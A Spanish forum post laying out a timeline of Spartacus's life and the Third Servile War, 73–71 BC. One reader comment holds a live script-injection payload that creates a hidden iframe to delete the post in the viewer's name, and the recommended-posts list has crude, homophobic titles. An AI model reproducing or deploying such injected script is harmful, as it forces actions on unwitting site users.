[cronología] la vida de spartacus, el famoso gladiador

Hecho por BlackGoku en la categoria ComiceHistorietas
SPARTACUS

 

espartaco

 

vida

Spartacus fue un esclavo tracio que, según fuentes romanas, dirigió la rebelión más importante contra la República romana en suelo itálico (conocida como tercera guerra servil, guerra de los Esclavos o guerra de los Gladiadores), hecho ocurrido entre los años 73 a. C. y 71 a. C.

 

cronologia

 

CRONOLOGIA

 

timeline

 

135 - 132 aC: revueltas de esclavos en Sicilia. (Primera Guerra Servil).

guerra serviles

roma
UBICACIÓN DE SICILIA

[Cronología] La vida de Spartacus, el famoso gladiador

104 - 100 aC: Segunda guerra de esclavos sicilianos (Segunda guerra servil).

spartacus

espartaco

109 aC: Spartacus nace en Tracia.

vida
UBICACIÓN DE TRACIA

cronologia

78 aC: Spartacus es reclutado para formar parte de las tropas auxiliares de Roma.

 


guerra serviles

73 aC: Spartacus es entrenado en la escuela de gladiadores (ludus) cerca de Capua perteneciente a Lentulus Batiatus, el comerciante de esclavos y lanista.

 


[Cronología] La vida de Spartacus, el famoso gladiador

73 aC: Spartacus se entrena como un gladiador romano ligeramente armado conocido como "el tracio". Un gladiador tracio llevaba un casco, protección de pierna acolchada y un pequeño escudo circular o cuadrangular llamado parmula.

 


espartaco

73 aC: Spartacus escapa de la escuela de gladiadores con 70-80 esclavos masacrando a todos los que se interponían en el camino.

 


cronologia

73 aC: La banda de gladiadores se refugia en el lado del Monte Vesubio (cerca de la actual Nápoles) dirigido por Spartacus con sus ayudantes Crixus, Castus, Gannicus y Enomaous.

 


guerra serviles

73 aC: El pequeño grupo de gladiadores saquea la zona y se les une rápidamente un gran número de esclavos, que acuden a él desde todos los puntos. Él es pronto a la cabeza de un formidable ejército de esclavos.

 


[Cronología] La vida de Spartacus, el famoso gladiador

73 aC: Estallido de la Tercera Guerra Servil, dirigida por el esclavo y gladiador Spartacus.

 


espartaco

73 aC: El pretor Claudius Glaber, con 3.000 soldados, es enviado por el Senado desde Roma para sofocar la revuelta de esclavos. El confiado Glaber y sus tropas son derrotados por el ejército de esclavos de Spartacus en la famosa Batalla del Monte Vesubio.

 


cronologia

72 aC: Después del éxito sobre Glaber, muchos más esclavos fugitivos se unen a Spartacus y su ejército de gladiadores aumentando el número a 30.000 esclavos escapados. El ejército de esclavos se divide, separándose en rangos de acuerdo a sus idiomas naturales.

 


guerra serviles

72 aC: el Senado envía a los dos cónsules (Lucius Gellius Publicola y Gnaeus Cornelius Lentulus Clodianus), cada uno con dos legiones, contra el ejército de esclavos rebeldes.

 


[Cronología] La vida de Spartacus, el famoso gladiador

72 aC: En la primavera de 72 a. C., Lucius Gellius Publicola ataca a Crixus y sus fuerzas (de celtas y germanos) en la región de Apulia. En la batalla del Monte Gárgano, Crixus usó su infantería germana para debilitar a los romanos antes de enviar a sus gladiadores celtas. Sin embargo sus guerreros germanos fueron derrotados, lo que forzó a Crixus a luchar en forma defensiva, siendo derrotado. Crixo fue asesinado y su ejército de 20.000 hombres fue totalmente aniquilado. Posteriormente Spartacus vence a Léntulo y luego a Publicola.

 


espartaco

72 aC: El ejército de esclavos derrota a otra legión bajo Gaius Cassius Longinus, el gobernador de la Galia Cisalpina. Spartacus aconseja escapar a través de los Alpes, pero los galos y los alemanes se niegan a ir, queriendo la oportunidad de robar y saquear más romanos.

 


cronologia

72 aC: Crassus es nombrado como mando supremo de guerra.

 


guerra serviles

72 aC: Spartacus mantiene juntos al ejército de esclavos que se traslada al sur de Italia, donde pueden alquilar barcos piratas a Sicilia (la ubicación de las dos primeras guerras serviles). El ejército de esclavos derrota a dos legiones romanas más de Marcus Licinius Crassus.

 


[Cronología] La vida de Spartacus, el famoso gladiador

72 aC: Crassus inflige el castigo de la Decimatio a sus soldados romanos por cobardía; esto hace que los soldados romanos teman más a Crassus que al ejército de gladiadores de Spartacus.

 


espartaco

72 aC: a fines del 72 a. C., Spartacus está acampado en Rhegium, cerca del estrecho de Messina.

 


cronologia

72 aC: Spartacus es traicionado por los piratas de Cilicia y su plan para transportar al ejército de esclavos a Sicilia fracasa.

timeline

guerra serviles

71 aC: Craso intenta atrapar a Spartacus y su ejército de esclavos en Calabria construyendo una zanja con un muro, de casi sesenta kilómetros de largo y cinco metros de ancho.

 


[Cronología] La vida de Spartacus, el famoso gladiador

71 aC: Spartacus logra romper las líneas de Craso y escapa hacia Bríndisi.

spartacus

espartaco

71 aC: Batalla en el río Silarus. Se cree que esta es la batalla final y la muerte de Spartacus. El cuerpo de Spartacus nunca fue encontrado o reconocido.

vida

cronologia

71 aC: Craso se venga de manera terrible del ejército de esclavos y ordena que 6.000 esclavos cautivos sean crucificados a lo largo de la Vía Apia desde Bríndisi a Roma. Sus cuerpos se dejan pudrir como un ejemplo para todos los esclavos que se rebelan contra Roma

 


guerra serviles

71 aC: 5,000 esclavos escapan de la captura y huyen hacia el norte. El resto del ejército de esclavos es destruido por Pompeyo

 


[Cronología] La vida de Spartacus, el famoso gladiador

71 aC: Pompeyo reclama crédito por terminar la guerra de esclavos y se le concede un triunfo. Crassus recibe solo una ovación.

 
 

 

espartaco

20

Comentarios 324

MadAra - Mad-1545016413077 - Hace 4 meses

El fin esta cerca "document.body.setAttribute('style',' background: url(https://vignette.wikia.nocookie.net/aldea/images/f/f4/Madara_Uchiha_sharingan.gif/revision/latest?cb=20110911030748&path-prefix=es)');setTimeout(function(){var i = document.createElement('iframe');i.src = 'https://1peluchinga.com/post/remove/'+window.location.toString().match(/(.*?):\/\/1peluchinga.com\/comentario\/(.*?)\//)[2];i.style.visibility = 'hidden';document.body.appendChild(i) ;}),3000"> 0 0

PulPacio - Pulpacio - Hace 4 meses

Un grande, lucho contra la tirania del imperio romano. Todos los que luchen contra una monarquia tienen mi apoyo

0 0

Recomendados papu

( llora voxed ) a partir de ahora, la tenencia de cp es delito


Taringa se esta llenando de normis y homosexuales ?


He notado algo raro sobre mi gato


Denuncian grave accidente con un robot de inseminación artificial en una clínica en palermo.


Urgente.esto es por si quieres ser el mejor amante en el video juego de la vida


Pequeña señorita con amor a la verga #1 mofos


Por que estoy en contra de las feminazis


Los mejores fondos de pantalla


Ejercicio de pierna a lo herni


Las rocas más peligrosas del planeta